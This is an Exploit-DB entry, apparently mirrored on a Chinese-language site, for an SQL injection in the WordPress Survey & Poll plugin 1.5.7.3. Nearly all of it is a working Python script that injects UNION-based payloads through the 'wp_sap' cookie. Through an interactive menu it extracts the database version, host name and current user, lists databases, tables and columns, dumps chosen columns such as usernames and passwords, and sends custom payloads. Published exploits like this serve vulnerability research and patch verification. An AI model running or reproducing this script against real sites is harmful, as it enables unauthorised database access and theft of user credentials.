WordPress Plugin Survey & Poll 1.5.7.3 – ‘sss_params’ SQL Injection (2)

• Exploit Database
• 122 阅读

• 作者： Mohin Paramasivam
  日期： 2021-09-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50269/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179

  # Exploit Title: WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2) # Date: 2021-09-07 # Exploit Author: Mohin Paramasivam (Shad0wQu35t) # Vendor Homepage: http://modalsurvey.pantherius.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip # Version: 1.5.7.3 # Tested on: MariaDB,MYSQL   #!/usr/bin/python3   import requests import re import warnings from bs4 import BeautifulSoup, CData import sys import argparse import os import time from termcolor import colored import validators   #Install all the requirements   """ pip3 install requests pip3 install bs4 pip3 install argparse pip3 install termcolor pip3 install validators   """     parser = argparse.ArgumentParser(description='WP Plugin Survey & Poll V1.5.7.3 SQL Injection (sss_params)') parser.add_argument('-u',help='Poll & Survey page URL') args = parser.parse_args()   url = args.u     if len(sys.argv) !=3: parser.print_help(sys.stderr) sys.exit()   if not validators.url(url): print(colored("\r\nEnter URL with http:// or https://\r\n",'red')) parser.print_help(sys.stderr) sys.exit()     def currect_db_name(): payload= """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,database(),11#"]""" inject(payload)     def db_version(): payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]""" inject(payload)     def hostname(): payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@hostname,11#"]""" inject(payload)     def current_user(): payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,user(),11#"]""" inject(payload)     def list_databases(): payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(schema_name),11 from information_schema.schemata#"]""" inject(payload)   def list_tables_db(): db = input("\r\nDatabase : ") payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema='%s'#"]""" %(db) inject(payload)     def list_columns_db(): db = input("\r\nDatabase : ") table = input("Table : ") payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(column_name),11 from information_schema.columns where table_schema='%s' and table_name='%s'#"]""" %(db,table) inject(payload)     def dump_db(): db = input("\r\nDatabase: ") table = input("Table: ") column = input("Columns Eg: users,password : ") dump = "%s.%s" %(db,table) payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(%s),11 from %s.%s#"]""" %(column,db,table) inject(payload)     def custom_payload(): payload = input("\r\nPayload : ") inject(payload)   def inject(inject_payload):   request = requests.Session()   cookies = { 'wp_sap': inject_payload, } print("\r\n"+colored("Sending Payload :",'red')+" %s\r\n" %colored((inject_payload),'green')) response = request.get(url,cookies=cookies) warnings.filterwarnings("ignore", category=UserWarning, module='bs4') soup = BeautifulSoup(response.text,features="lxml") cdata = soup.find(text=re.compile("CDATA")) split_cdata = list(cdata.split(':')) output = split_cdata[11] print("\r\n"+colored("SQLI OUTPUT :",'red')+" %s\r\n" %colored((output),'green')) time.sleep(1) main()       def main(): print ("Automated SQL Injector (wp-survey-and-poll)") print ("Enter the respective number to select option") print ("#EXAMPLE Option : 1\r\n")       print("Option 1 : Grab Database Version") print("Option 2 : Get Current Database Name") print("Option 3 : Get Hostname ") print("Option 4 : Get Current User") print("Option 5 : List All Databases") print("Option 6 : List Tables From Database") print("Option 7 : List Columns from Tables") print("Option 8 : Dump Database") print("Option 9 : Custom Payload") print("Option 10 : Exit")     print("\r\n") option_selected = str(input("Select Option : "))     if(option_selected=="1"): db_version()   if(option_selected=="2"): currect_db_name()   if(option_selected=="3"): hostname()   if(option_selected=="4"): current_user()   if(option_selected=="5"): list_databases()   if(option_selected=="6"): list_tables_db()   if(option_selected=="7"): list_columns_db()   if(option_selected=="8"): dump_db()   if(option_selected=="9"): custom_payload()   if(option_selected=="10"): sys.exit() else: main()   main()